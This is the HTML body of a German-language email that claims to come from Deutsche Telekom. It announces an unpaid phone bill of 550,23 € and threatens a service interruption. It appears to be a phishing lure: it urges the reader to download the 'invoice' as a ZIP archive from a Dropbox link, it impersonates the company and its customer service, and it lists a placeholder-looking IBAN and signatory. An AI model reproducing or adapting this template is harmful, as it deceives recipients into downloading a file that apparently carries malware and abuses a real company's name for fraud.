<!DOCTYPE html>
<html>
        <head>
                <title></title>
        </head>
        <body>
                <div>
                        Sehr geehrter Kunde,</div>
                <div>
                         </div>
                <div>
                        Wir hoffen, dass es Ihnen gut geht.<br />
                        Wir möchten Sie darüber informieren, dass Ihre Telefonrechnung nicht bezahlt wurde. Um eine Unterbrechung Ihres Dienstes zu vermeiden, begleichen Sie Ihre Rechnung bitte so schnell wie möglich.</div>
                <div>
                         </div>
                <div>
                        Sie finden alle relevanten Rechnungsdetails in dem Dokument, das Sie unter folgendem Link herunterladen können: <strong> <a href="https://dl.dropboxusercontent.com/scl/fi/pket8oc6nv7m72ilkbq1l/DKM938492342342.zip?rlkey=5wqjbhljccvty5k881n0hhzcr&st=otl6ag2y&dl=0" rel="noreferrer">Rechnung herunterladen</a>. </strong></div>
                <div>
                        <br />
                        <strong>Rechnungsdetails: </strong></div>
                <div style="text-align: center;">
                        <ul>
                                <li style="text-align: left;">
                                        <strong>Rechnungsnummer</strong>: DE123456789</li>
                                <li style="text-align: left;">
                                        <strong>Fälliger Betrag</strong>: <strong> <span style="background-color: #ffffff; color: #ff0000;">550,23 €</span> </strong></li>
                                <li style="text-align: left;">
                                        <strong>Fälligkeitsdatum</strong>: 12.07.2024</li>
                                <li style="text-align: left;">
                                        <strong>Akzeptierte Zahlungsmethoden:</strong> Banküberweisung, Kreditkarte, PayPal</li>
                        </ul>
                </div>
                <div>
                        Um einen kontinuierlichen Service zu gewährleisten, bitten wir Sie, die Rechnungsdetails zu überprüfen und die Zahlung so bald wie möglich vorzunehmen. Sobald die Zahlung bestätigt ist, wird Ihr Telefonservice ohne Unterbrechung fortgesetzt.</div>
                <div>
                        <br />
                        <strong>Kontaktinformationen: </strong><br />
                         </div>
                <div>
                        Wenn Sie Fragen haben oder weitere Unterstützung benötigen, zögern Sie bitte nicht, sich an unser Kundenserviceteam zu wenden. Wir stehen Ihnen bei allen Fragen zur Rechnung oder zu Ihrem Telefonservice zur Verfügung.</div>
                <div>
                        <br />
                        <strong>Kundendienstkontakt: </strong></div>
                <div style="text-align: center;">
                        <ul>
                                <li style="text-align: left;">
                                        <strong>Telefon:</strong> +49 800 330 1000</li>
                                <li style="text-align: left;">
                                        <strong>E-Mail:</strong> <a rel="noreferrer">support@telekom.de</a></li>
                                <li style="text-align: left;">
                                        <strong>Bürozeiten: Montag bis Freitag</strong>, 8:00 bis 20:00 Uhr (MEZ)</li>
                        </ul>
                </div>
                <div>
                        <strong>Firmeninformationen:</strong></div>
                <div>
                        Deutsche Telekom AG Friedrich-Ebert-Allee 140 53113 Bonn Deutschland</div>
                <div>
                        <strong>Bankverbindung für die Zahlung:</strong></div>
                <div style="text-align: center;">
                        <ul>
                                <li style="text-align: left;">
                                        <strong>Name der Bank:</strong> Deutsche Bank</li>
                                <li style="text-align: left;">
                                        <strong>IBAN:</strong> DE89 1007 0000 1234 5678 00</li>
                                <li style="text-align: left;">
                                        <strong>BIC/SWIFT:</strong> DEUTDEBBXXX</li>
                        </ul>
                </div>
                <div>
                        Wir danken Ihnen für Ihre umgehende Bearbeitung dieser Angelegenheit und freuen uns darauf, den kontinuierlichen Betrieb Ihrer Telefonservices sicherzustellen.</div>
                <div>
                        Vielen Dank für Ihre Kooperation.</div>
                <div>
                        Mit freundlichen Grüßen,<br />
                         </div>
                <div>
                        <strong>Max Müller</strong><br />
                        <strong>Geschäftsführer</strong><br />
                        <strong>Deutsche Telekom AG</strong><br />
                        <strong>Friedrich-Ebert-Allee 140</strong><br />
                        <strong>53113 Bonn</strong><br />
                        <strong>Deutschland</strong><br />
                        <strong>Telefon: +49 800 330 1000</strong><br />
                        <strong>E-Mail: <a rel="noreferrer">support@telekom.de</a> </strong></div>
        </body>
</html>